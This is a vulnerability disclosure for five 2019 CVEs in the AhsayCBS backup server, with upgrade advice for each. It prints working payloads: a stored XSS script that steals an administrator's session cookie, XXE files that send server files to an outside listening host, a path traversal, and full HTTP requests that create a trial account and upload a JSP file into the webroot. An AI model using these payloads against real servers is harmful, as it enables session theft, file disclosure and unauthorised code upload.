Ahsay Cloud Backup

AhsayCBS is a server component to be installed on a physical server or virtual machine. It comes with a web based central management console for system administrator to easily manage the whole backup system, as well as all AhsayOBM / AhsayACB backup users and their backup data through any web browser. Users can also login to the User Web Console to manage backup set, perform backup/restore and monitor live activities.

Users' backup data can be hosted on AhsayCBS internal storage, FTP / SFTP server, and cloud storage (e.g. Amazon S3, Google Cloud Storage, Microsoft Azure, etc.).





CVE-2019-10263 - Stored Cross Site Scripting (XSS)

Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

When creating a account the field "Alias/Display name" is vulnerable to a stored XSS, this XSS will be triggerd when a administrator visits the "Users, Groups & Policies" page.This stored XSS can be leveraged to steal the administrators cookie. This is because the cookie is being reflected in the HTML

<link rel="stylesheet" type="text/css" href="/cbs/atl/std.css?s=AA25DCC15A81ED1F9C82B1F4D10A4F34">

By simply adding the following Javascript to the "Alias/Display name" field:

'><script src=https://www.wbsec.nl/ahsay/backup.js></script> 

backup.js contains:

try {
        var scripts = document.getElementsByTagName("script");
        for (var i = 0; i < scripts.length; ++i) {
                js = scripts[i].getAttribute("src").includes("=");
                if (js){
                        //console.debug(scripts[i]);
                        cookie = scripts[i].getAttribute("src").split("=")[1];
                        console.debug(cookie);
                }
        }
} catch (err) {
        
        //console.debug(err);
}
alert(document.URL + ": JSESSIONID=" + cookie); 

resulting in grabbing the cookie shown below:



CVE-2019-10264 - XML External Entity (XXE)

Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

For this we need a couple of things.

First we need to create a zip file containing users.xml, users.xml must contain the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.16.238.1/xxe.dtd">
<settings>&send;</settings> 
    

Then we need to create the file xxe.dtd, that can contain the file we want to read. We then send the content to our listening server.

<!ENTITY % file SYSTEM "file:///C:\\Program Files\\AhsayCBS\\version.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.16.238.1/?%file;'>">
%all;   
    

now we need to start a webserver I use Python for this on my system 172.16.238.1

Run the following command in the directory containing the .dtd file:

        python -m SimpleHTTPServer 80
    

There will be a webserver listening on port 80. Now in the application go to the page to "Move / Import / Export Users" and choose the option import users to and select the zip file we created.

Screenshot: importing the zip file and saving it.

Screenshot: When the save button is hit, we immediately get a response to our webserver requesting the dtd file. This file gets executed and sends the content to our server. (8.1.0.50)



CVE-2019-10265 - Path Traversal

Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

Path traversal the following page can be used to browse the server the AhsayCBS v8.1.0.50 is installed on.

On the page https://172.16.238.213/cbs/system/ShowAdvanced.do "File Explorer" it is possible to change the directory in the Javascript code. When this is done to lets say "C:" we can browse the whole server.

Screenshot: Changing the Javascript to "C:\\"

Screenshot: If we now click the link "C:\Program Files\AhsayCBS" we will be redirected to "C:\"



CVE-2019-10266 - unauthenticated XML External Entity (XXE)

Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

the XXE sending the following POST request to the server will trigger an error that will show the content of a file or a directory:

POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80
        
<?xml version="1.0"?>
 <!DOCTYPE root [<!ENTITY % remote SYSTEM "https://www.wbsec.nl/ahsay/oob.dtd"> %remote;%intern; %trick;]>
        
    
As you can see it includes the following file https://www.wbsec.nl/xxe/oob.dtd this file is hosted at my server and contains:
<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY &#37;
        trick SYSTEM 'file://:%payl;/%payl;'>">
When the POST request is executed the server will fetch the file and tries to interpret it but it fails. This will then result in an error message showing the content of the directory. With the XXE it is possible to read files, scan internal networks and request internal systems. I do not have to use any form of authentication for this.



CVE-2019-10267 - File Upload

Advisory

Currently Ahsay has not released an official update.

Update 29-7-2019: for paying customers there is a hotfix released, "v8.1.1.53", thru there Partner Portal at: https://www.ahsay.com/partners/en/home/index.jsp?pageContentKey=ahsay_assets_hotfix-v8

Technical details

To exploit this vulnerability we need create a trial account or have valid credentials. By default trial account creation is enabled. We can verify if a system has trial accounts enabled with the following POST request to the server.

POST /obs/obm7/user/isTrialEnabled HTTP/1.1
Host: 172.16.238.175
Connection: close
Content-Length: 0
        

If the server replies withe "ENABLED" we can create a trial account.

Creating the trial account we first need to base64 encode the username and password and place these in the POST request header like below:

POST /obs/obm7/user/addTrialUser HTTP/1.1
Host: 172.16.238.175
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-RSW-custom-encode-username: Z3pTc1pnMmE=
X-RSW-custom-encode-password: elh1QmtRU24wMTU3MF4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
        

If the account is created succesfully the server will respond with "HTTP/1.1 200 OK"

Now for the upload part, we can upload any file to any location on the server as long as the Ahsay server user has privileges to.

For this to work we need to set the following headers and base64 encode the content:

Below the full PUT request to upload

PUT /obs/obm7/file/upload HTTP/1.1
Host: 172.16.238.175
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-RSW-Request-0: Z3pTc1pnMmE=
X-RSW-Request-1: elh1QmtRU24wMTU3MF4=
X-RSW-custom-encode-path: Li4vLi4vd2ViYXBwcy9jYnMvaGVscC9lbi9oZWxsb193b3JsZC5qc3A=
Content-Length: 98
Connection: close

<%= "Hello World!" %>

The server should respond with "HTTP/1.1 201 Created" and in this case we can access the file in a browser. https://172.16.238.175/cbs/help/en/hello_world.jsp returning "Hello World!"